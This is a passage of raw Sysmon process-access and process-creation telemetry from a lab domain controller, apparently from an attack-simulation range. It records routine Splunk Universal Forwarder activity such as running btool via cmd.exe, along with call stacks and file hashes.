Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E5B-6005-5600-00000000A301}37363760C:\Windows\system32\cmd.exe{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.304{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.299{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.267{59A5CD1D-8E5B-6005-5400-00000000A301}37683824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5400-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 